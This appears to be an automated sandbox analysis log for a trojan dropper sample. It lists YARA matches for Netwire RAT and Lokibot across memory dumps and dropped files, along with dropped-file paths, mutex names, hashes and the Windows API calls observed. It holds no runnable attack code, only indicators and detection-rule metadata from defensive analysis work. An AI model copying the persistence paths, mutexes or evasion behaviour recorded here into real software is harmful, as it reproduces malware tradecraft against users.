        Source: 0000000B.00000000.271440623.000000000041E000.00000008.00020000.sdmp, type: MEMORY | Matched rule: Malicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: 0000000B.00000000.271440623.000000000041E000.00000008.00020000.sdmp, type: MEMORY | Matched rule: MAL_unspecified_Jan18_1 date = 2018-01-19, hash1 = f87879b29ff83616e9c9044bd5fb847cf5d2efdd2f01fc284d1a6ce7d464a417, author = Florian Roth, description = Detects unspecified malware sample, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0000000B.00000000.271440623.000000000041E000.00000008.00020000.sdmp, type: MEMORY | Matched rule: netwire author = JPCERT/CC Incident Response Group, description = detect netwire in memory, rule_usage = memory scan, reference = internal research
        Source: 00000003.00000002.232283165.0000000000F30000.00000004.00000040.sdmp, type: MEMORY | Matched rule: Suspicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: 00000003.00000002.232283165.0000000000F30000.00000004.00000040.sdmp, type: MEMORY | Matched rule: Malicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: 00000003.00000002.232283165.0000000000F30000.00000004.00000040.sdmp, type: MEMORY | Matched rule: MAL_unspecified_Jan18_1 date = 2018-01-19, hash1 = f87879b29ff83616e9c9044bd5fb847cf5d2efdd2f01fc284d1a6ce7d464a417, author = Florian Roth, description = Detects unspecified malware sample, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000003.00000002.232283165.0000000000F30000.00000004.00000040.sdmp, type: MEMORY | Matched rule: netwire author = JPCERT/CC Incident Response Group, description = detect netwire in memory, rule_usage = memory scan, reference = internal research
        Source: 00000004.00000000.231241127.000000000041E000.00000008.00020000.sdmp, type: MEMORY | Matched rule: Suspicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: 00000004.00000000.231241127.000000000041E000.00000008.00020000.sdmp, type: MEMORY | Matched rule: Malicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: 00000004.00000000.231241127.000000000041E000.00000008.00020000.sdmp, type: MEMORY | Matched rule: MAL_unspecified_Jan18_1 date = 2018-01-19, hash1 = f87879b29ff83616e9c9044bd5fb847cf5d2efdd2f01fc284d1a6ce7d464a417, author = Florian Roth, description = Detects unspecified malware sample, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000004.00000000.231241127.000000000041E000.00000008.00020000.sdmp, type: MEMORY | Matched rule: netwire author = JPCERT/CC Incident Response Group, description = detect netwire in memory, rule_usage = memory scan, reference = internal research
        Source: 00000006.00000000.253998973.000000000041E000.00000008.00020000.sdmp, type: MEMORY | Matched rule: Suspicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: 00000006.00000000.253998973.000000000041E000.00000008.00020000.sdmp, type: MEMORY | Matched rule: Malicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: 00000006.00000000.253998973.000000000041E000.00000008.00020000.sdmp, type: MEMORY | Matched rule: MAL_unspecified_Jan18_1 date = 2018-01-19, hash1 = f87879b29ff83616e9c9044bd5fb847cf5d2efdd2f01fc284d1a6ce7d464a417, author = Florian Roth, description = Detects unspecified malware sample, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000006.00000000.253998973.000000000041E000.00000008.00020000.sdmp, type: MEMORY | Matched rule: netwire author = JPCERT/CC Incident Response Group, description = detect netwire in memory, rule_usage = memory scan, reference = internal research
        Source: 00000003.00000002.231997731.000000000041E000.00000004.00020000.sdmp, type: MEMORY | Matched rule: Suspicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: 00000003.00000002.231997731.000000000041E000.00000004.00020000.sdmp, type: MEMORY | Matched rule: Malicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: 00000003.00000002.231997731.000000000041E000.00000004.00020000.sdmp, type: MEMORY | Matched rule: MAL_unspecified_Jan18_1 date = 2018-01-19, hash1 = f87879b29ff83616e9c9044bd5fb847cf5d2efdd2f01fc284d1a6ce7d464a417, author = Florian Roth, description = Detects unspecified malware sample, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000003.00000002.231997731.000000000041E000.00000004.00020000.sdmp, type: MEMORY | Matched rule: netwire author = JPCERT/CC Incident Response Group, description = detect netwire in memory, rule_usage = memory scan, reference = internal research
        Source: 00000003.00000000.230213286.000000000041E000.00000008.00020000.sdmp, type: MEMORY | Matched rule: Suspicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: 00000003.00000000.230213286.000000000041E000.00000008.00020000.sdmp, type: MEMORY | Matched rule: Malicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: 00000003.00000000.230213286.000000000041E000.00000008.00020000.sdmp, type: MEMORY | Matched rule: MAL_unspecified_Jan18_1 date = 2018-01-19, hash1 = f87879b29ff83616e9c9044bd5fb847cf5d2efdd2f01fc284d1a6ce7d464a417, author = Florian Roth, description = Detects unspecified malware sample, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000003.00000000.230213286.000000000041E000.00000008.00020000.sdmp, type: MEMORY | Matched rule: netwire author = JPCERT/CC Incident Response Group, description = detect netwire in memory, rule_usage = memory scan, reference = internal research
        Source: 00000006.00000002.254616303.000000000041E000.00000004.00020000.sdmp, type: MEMORY | Matched rule: Suspicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: 00000006.00000002.254616303.000000000041E000.00000004.00020000.sdmp, type: MEMORY | Matched rule: Malicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: 00000006.00000002.254616303.000000000041E000.00000004.00020000.sdmp, type: MEMORY | Matched rule: MAL_unspecified_Jan18_1 date = 2018-01-19, hash1 = f87879b29ff83616e9c9044bd5fb847cf5d2efdd2f01fc284d1a6ce7d464a417, author = Florian Roth, description = Detects unspecified malware sample, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000006.00000002.254616303.000000000041E000.00000004.00020000.sdmp, type: MEMORY | Matched rule: netwire author = JPCERT/CC Incident Response Group, description = detect netwire in memory, rule_usage = memory scan, reference = internal research
        Source: Process Memory Space: Host.exe PID: 7148, type: MEMORY | Matched rule: Suspicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: Process Memory Space: Host.exe PID: 7148, type: MEMORY | Matched rule: Malicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: Process Memory Space: Host.exe PID: 7148, type: MEMORY | Matched rule: MAL_unspecified_Jan18_1 date = 2018-01-19, hash1 = f87879b29ff83616e9c9044bd5fb847cf5d2efdd2f01fc284d1a6ce7d464a417, author = Florian Roth, description = Detects unspecified malware sample, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: Process Memory Space: Host.exe PID: 7148, type: MEMORY | Matched rule: netwire author = JPCERT/CC Incident Response Group, description = detect netwire in memory, rule_usage = memory scan, reference = internal research
        Source: Process Memory Space: Host.exe PID: 5832, type: MEMORY | Matched rule: Suspicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: Process Memory Space: Host.exe PID: 5832, type: MEMORY | Matched rule: Malicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: Process Memory Space: Host.exe PID: 5832, type: MEMORY | Matched rule: MAL_unspecified_Jan18_1 date = 2018-01-19, hash1 = f87879b29ff83616e9c9044bd5fb847cf5d2efdd2f01fc284d1a6ce7d464a417, author = Florian Roth, description = Detects unspecified malware sample, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: Process Memory Space: Host.exe PID: 5832, type: MEMORY | Matched rule: netwire author = JPCERT/CC Incident Response Group, description = detect netwire in memory, rule_usage = memory scan, reference = internal research
        Source: Process Memory Space: StartUpHost.exe PID: 7124, type: MEMORY | Matched rule: Suspicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: Process Memory Space: StartUpHost.exe PID: 7124, type: MEMORY | Matched rule: Malicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: Process Memory Space: StartUpHost.exe PID: 7124, type: MEMORY | Matched rule: MAL_unspecified_Jan18_1 date = 2018-01-19, hash1 = f87879b29ff83616e9c9044bd5fb847cf5d2efdd2f01fc284d1a6ce7d464a417, author = Florian Roth, description = Detects unspecified malware sample, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: Process Memory Space: StartUpHost.exe PID: 7124, type: MEMORY | Matched rule: netwire author = JPCERT/CC Incident Response Group, description = detect netwire in memory, rule_usage = memory scan, reference = internal research
        Source: Process Memory Space: Host.exe PID: 6772, type: MEMORY | Matched rule: Suspicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: Process Memory Space: Host.exe PID: 6772, type: MEMORY | Matched rule: Malicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: Process Memory Space: Host.exe PID: 6772, type: MEMORY | Matched rule: MAL_unspecified_Jan18_1 date = 2018-01-19, hash1 = f87879b29ff83616e9c9044bd5fb847cf5d2efdd2f01fc284d1a6ce7d464a417, author = Florian Roth, description = Detects unspecified malware sample, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: Process Memory Space: Host.exe PID: 6772, type: MEMORY | Matched rule: netwire author = JPCERT/CC Incident Response Group, description = detect netwire in memory, rule_usage = memory scan, reference = internal research
        Source: C:\Users\user\AppData\Roaming\Install\Host.exe, type: DROPPED | Matched rule: Suspicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: C:\Users\user\AppData\Roaming\Install\Host.exe, type: DROPPED | Matched rule: Malicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: C:\Users\user\AppData\Roaming\Install\Host.exe, type: DROPPED | Matched rule: MAL_unspecified_Jan18_1 date = 2018-01-19, hash1 = f87879b29ff83616e9c9044bd5fb847cf5d2efdd2f01fc284d1a6ce7d464a417, author = Florian Roth, description = Detects unspecified malware sample, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: C:\Users\user\AppData\Roaming\Install\Host.exe, type: DROPPED | Matched rule: netwire author = JPCERT/CC Incident Response Group, description = detect netwire in memory, rule_usage = memory scan, reference = internal research
        Source: C:\Users\user\AppData\Local\Temp\StartUpHost.exe, type: DROPPED | Matched rule: Suspicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: C:\Users\user\AppData\Local\Temp\StartUpHost.exe, type: DROPPED | Matched rule: Malicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: C:\Users\user\AppData\Local\Temp\StartUpHost.exe, type: DROPPED | Matched rule: MAL_unspecified_Jan18_1 date = 2018-01-19, hash1 = f87879b29ff83616e9c9044bd5fb847cf5d2efdd2f01fc284d1a6ce7d464a417, author = Florian Roth, description = Detects unspecified malware sample, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: C:\Users\user\AppData\Local\Temp\StartUpHost.exe, type: DROPPED | Matched rule: netwire author = JPCERT/CC Incident Response Group, description = detect netwire in memory, rule_usage = memory scan, reference = internal research
        Source: C:\Users\user\AppData\Local\Temp\build.exe, type: DROPPED | Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
        Source: C:\Users\user\AppData\Local\Temp\build.exe, type: DROPPED | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
        Source: C:\Users\user\AppData\Local\Temp\build.exe, type: DROPPED | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
        Source: 11.2.Host.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Suspicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: 11.2.Host.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Malicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: 11.2.Host.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_unspecified_Jan18_1 date = 2018-01-19, hash1 = f87879b29ff83616e9c9044bd5fb847cf5d2efdd2f01fc284d1a6ce7d464a417, author = Florian Roth, description = Detects unspecified malware sample, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 11.2.Host.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: netwire author = JPCERT/CC Incident Response Group, description = detect netwire in memory, rule_usage = memory scan, reference = internal research
        Source: 2.0.build.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
        Source: 2.0.build.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
        Source: 2.0.build.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
        Source: 6.0.Host.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Suspicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: 6.0.Host.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Malicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: 6.0.Host.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_unspecified_Jan18_1 date = 2018-01-19, hash1 = f87879b29ff83616e9c9044bd5fb847cf5d2efdd2f01fc284d1a6ce7d464a417, author = Florian Roth, description = Detects unspecified malware sample, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 6.0.Host.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: netwire author = JPCERT/CC Incident Response Group, description = detect netwire in memory, rule_usage = memory scan, reference = internal research
        Source: 4.0.Host.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Suspicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: 4.0.Host.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Malicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: 4.0.Host.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_unspecified_Jan18_1 date = 2018-01-19, hash1 = f87879b29ff83616e9c9044bd5fb847cf5d2efdd2f01fc284d1a6ce7d464a417, author = Florian Roth, description = Detects unspecified malware sample, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 4.0.Host.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: netwire author = JPCERT/CC Incident Response Group, description = detect netwire in memory, rule_usage = memory scan, reference = internal research
        Source: 3.0.StartUpHost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Suspicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: 3.0.StartUpHost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Malicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: 3.0.StartUpHost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_unspecified_Jan18_1 date = 2018-01-19, hash1 = f87879b29ff83616e9c9044bd5fb847cf5d2efdd2f01fc284d1a6ce7d464a417, author = Florian Roth, description = Detects unspecified malware sample, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 3.0.StartUpHost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: netwire author = JPCERT/CC Incident Response Group, description = detect netwire in memory, rule_usage = memory scan, reference = internal research
        Source: 4.2.Host.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Suspicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: 4.2.Host.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Malicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: 4.2.Host.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_unspecified_Jan18_1 date = 2018-01-19, hash1 = f87879b29ff83616e9c9044bd5fb847cf5d2efdd2f01fc284d1a6ce7d464a417, author = Florian Roth, description = Detects unspecified malware sample, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 4.2.Host.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: netwire author = JPCERT/CC Incident Response Group, description = detect netwire in memory, rule_usage = memory scan, reference = internal research
        Source: 3.2.StartUpHost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Suspicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: 3.2.StartUpHost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Malicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: 3.2.StartUpHost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_unspecified_Jan18_1 date = 2018-01-19, hash1 = f87879b29ff83616e9c9044bd5fb847cf5d2efdd2f01fc284d1a6ce7d464a417, author = Florian Roth, description = Detects unspecified malware sample, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 3.2.StartUpHost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: netwire author = JPCERT/CC Incident Response Group, description = detect netwire in memory, rule_usage = memory scan, reference = internal research
        Source: 2.2.build.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
        Source: 2.2.build.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
        Source: 11.0.Host.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Suspicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: 11.0.Host.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Malicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: 11.0.Host.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_unspecified_Jan18_1 date = 2018-01-19, hash1 = f87879b29ff83616e9c9044bd5fb847cf5d2efdd2f01fc284d1a6ce7d464a417, author = Florian Roth, description = Detects unspecified malware sample, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 11.0.Host.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: netwire author = JPCERT/CC Incident Response Group, description = detect netwire in memory, rule_usage = memory scan, reference = internal research
        Source: 6.2.Host.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Suspicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: 6.2.Host.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Malicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: 6.2.Host.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_unspecified_Jan18_1 date = 2018-01-19, hash1 = f87879b29ff83616e9c9044bd5fb847cf5d2efdd2f01fc284d1a6ce7d464a417, author = Florian Roth, description = Detects unspecified malware sample, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 6.2.Host.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: netwire author = JPCERT/CC Incident Response Group, description = detect netwire in memory, rule_usage = memory scan, reference = internal research
        Source: SecuriteInfo.com.Trojan.MulDrop.1161.895.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: SecuriteInfo.com.Trojan.MulDrop.1161.895.exe, u0023u0023.cs | Cryptographic APIs: 'CreateDecryptor'
        Source: SecuriteInfo.com.Trojan.MulDrop.1161.895.exe, u0023u0023.cs | Cryptographic APIs: 'TransformFinalBlock'
        Source: 0.0.SecuriteInfo.com.Trojan.MulDrop.1161.895.exe.ee0000.0.unpack, u0023u0023.cs | Cryptographic APIs: 'CreateDecryptor'
        Source: 0.0.SecuriteInfo.com.Trojan.MulDrop.1161.895.exe.ee0000.0.unpack, u0023u0023.cs | Cryptographic APIs: 'TransformFinalBlock'
        Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@11/7@4/2
        Source: C:\Users\user\AppData\Local\Temp\build.exe | Code function: 2_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges
        Source: C:\Users\user\AppData\Local\Temp\StartUpHost.exe | Code function: 3_2_004091DC SetErrorMode,GetLogicalDriveStringsA,GetVolumeInformationA,GetDiskFreeSpaceExA,GetDriveTypeA
        Source: C:\Users\user\AppData\Local\Temp\StartUpHost.exe | Code function: 3_2_00402D70 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle
        Source: C:\Users\user\AppData\Local\Temp\build.exe | Code function: 2_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop.1161.895.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\SecuriteInfo.com.Trojan.MulDrop.1161.895.exe.log
        Source: C:\Users\user\AppData\Roaming\Install\Host.exe | Mutant created: \Sessions\1\BaseNamedObjects\IHDqxKdm
        Source: C:\Users\user\AppData\Local\Temp\build.exe | Mutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | File created: C:\Users\user\AppData\Local\Temp\ope8111.tmp
        Source: SecuriteInfo.com.Trojan.MulDrop.1161.895.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop.1161.895.exe | Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop.1161.895.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop.1161.895.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior